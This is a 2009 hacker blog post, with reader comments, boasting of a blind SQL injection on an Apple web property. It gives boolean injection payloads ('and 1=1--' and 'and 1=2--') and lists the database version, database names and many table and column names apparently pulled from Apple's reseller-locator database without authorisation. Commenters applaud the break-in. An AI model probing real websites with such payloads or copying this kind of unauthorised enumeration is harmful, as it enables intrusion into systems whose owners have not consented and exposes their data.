Apple.com Blind SQL Injection – TinKode
December 27th, 2009 TinKode Posted in Blind SQL Injection | 7 Comments »
_____ _____ _ ______
/\ | __ \| __ \| | | ____|
/ \ | |__) | |__) | | | |__
/ /\ \ | ___/| ___/| | | __|
/ ____ \| | | | | |____| |____
/_/ \_\_| |_| |______|______|
#BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.
Testing:
and 1=1– (True)
and 1=2– (false, and redirect)
Now let’s see the version
#Version: 5
#Databases: locator_asia, test
#Tables from “locator_asia” database
[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
Columns from “reseller_city_utf8” table
[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4
A good thing is that there is nothing important to extract…
Great, good bye, TinKode
December 27th, 2009 at 07:03
nice job, bro
BTW hell crew is still down.
December 27th, 2009 at 07:52
Nice Job
December 27th, 2009 at 15:00
it’s OLD!!!!
from other USERS.. ME!
http://forum.darkc0de.com/index.php?action=vthread&topic=12626&forum=12&page=0
December 27th, 2009 at 15:16
Good… i didn’t saw, anyway, i think, this blind sqli was found by many others, because how I say, can be found in only 5 minutes with google!
December 27th, 2009 at 18:03
[...] apple.com TinKode Stuff Blog Archive Apple.com Blind SQL Injection – TinKode [...]
December 27th, 2009 at 18:20
Social comments and analytics for this post…
This post was mentioned on Twitter by gollmann: Apple.com vulnerable to Blind SQL Injection. http://bit.ly/7mhHG9...
December 28th, 2009 at 16:26
[...] jest na atak Blind SQL Injection w jednym z parametrów. Jako dowód, TinKode opublikowa? na swojej stronie nast?puj?ce [...]